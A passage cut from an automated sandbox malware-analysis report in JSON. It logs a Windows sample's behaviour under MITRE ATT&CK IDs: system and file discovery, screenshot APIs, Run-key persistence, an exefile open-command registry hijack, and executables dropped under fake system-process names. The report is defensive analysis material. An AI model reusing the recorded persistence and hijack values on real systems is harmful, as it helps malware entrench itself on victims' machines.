1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff833ed1777412d277000000000000e6680000000006000000000000000000000094d1120000000000050000000000e668c0d1120002000040c4d31200c4d312001a12d27700000000acd1120000000000c8ae1d000203d277000200008801d2770000000008d41200a401d277000000000000000000000101560045005200530049004f004e002e0064006c006c000000000000000000cb770000cb77ff2bd0771f57ec77020000000c026300000063003000ce0001000000838d2e00feffffff00000000dcd21200089b63006cd2120080f42a76000063000000000089f42a76 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000201260008026cd51200568b1f00000000000000000000000000c41d61000000000070000000433a5c446f63756d656e747320616e642053657474696e67735c416c6c2055736572735c5374617274204d656e755c50726f6772616d735c5374617274757000080000000000000080000000d0d61200a0281b002202fb7f8000000074d51200668ad675a0281b00d0d61200d0d712003cd61200bcd61200000000003cd61200c0514000d0d61200a0281b0000000000e0d5120083bfa0720a000000c0514000d0d61200a4d512005fb9a1720a2000000a20400000000000c0514000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000201260008026cd51200568b1f00000000000000000000000000c41d610000000000700000005a3a5c446f63756d656e747320616e642053657474696e67735c416c6c2055736572735c5374617274204d656e755c50726f6772616d735c5374617274757000080000000000000080000000d0d61200a0281b002202fb7f8000000074d51200668ad675a0281b00d0d61200d0d712003cd61200bcd61200000000003cd61200c0514000d0d61200a0281b0000000000e0d5120083bfa0720a000000c0514000d0d61200a4d512005fb9a1720a2000000a20400000000000c0514000 (UID: 00000000-00005328)\n \"xk.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003688)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005328)\n \"xk.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003688)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004256)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005476)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001968)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003760)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005196)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"IsWow64Process\" with parameter \"5328\" - (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005328)\n \"xk.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003688)\n \"WINLOGON.EXE\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004256)\n \"CSRSS.EXE\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005476)\n \"SERVICES.EXE\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00001968)\n \"LSASS.EXE\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003760)\n \"SMSS.EXE\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005196)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetWindowTextA\" (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"xk.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"IExplorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"LSASS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"xk.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"xk.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"xk.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"SERVICES.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"SERVICES.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"SERVICES.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"67010b11\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FindNextFileW\" with parameter HelpPane.exe (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-159", "type": 3, "relevance": 1, "name": "Modifies windows command shell related registry path (UAC Bypass)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\")", "origin": "Registry Access", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\RDPNP\\NETWORKPROVIDER\"; Key: \"NAME\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\RDPNP\\NETWORKPROVIDER\"; Key: \"CLASS\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\RDPNP\\NETWORKPROVIDER\"; Key: \"PROVIDERPATH\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\NETWORKPROVIDER\"; Key: \"NAME\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\NETWORKPROVIDER\"; Key: \"CLASS\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\NETWORKPROVIDER\"; Key: \"PROVIDERPATH\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WEBCLIENT\\NETWORKPROVIDER\"; Key: \"NAME\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WEBCLIENT\\NETWORKPROVIDER\"; Key: \"CLASS\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WEBCLIENT\\NETWORKPROVIDER\"; Key: \"PROVIDERPATH\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" opened \"\\Device\\KsecDD\"\n \"xk.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"XK\"; Value: \"%WINDIR%\\xk.exe\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"LOGONHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\CSRSS.EXE\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM MONITORING\"; Value: \"%APPDATA%\\WINDOWS\\LSASS.EXE\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MSMSGS\"; Value: \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SERVICEHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\SERVICES.EXE\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xk.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\xk.exe]- [targetUID: 00000000-00005328]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\XK\\New Folder.exe]- [targetUID: 00000000-00005328]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00005328]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00005328]\n \"xk.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\xk.exe]- [targetUID: 00000000-00005328]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005328]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00005328]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005328]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005328]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005328]\n \"Mig2.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\Mig2.scr]- [targetUID: 00000000-00005328]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005328]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005328]\n \"XK.EXE.67E3CBAF.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67E3CBB1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 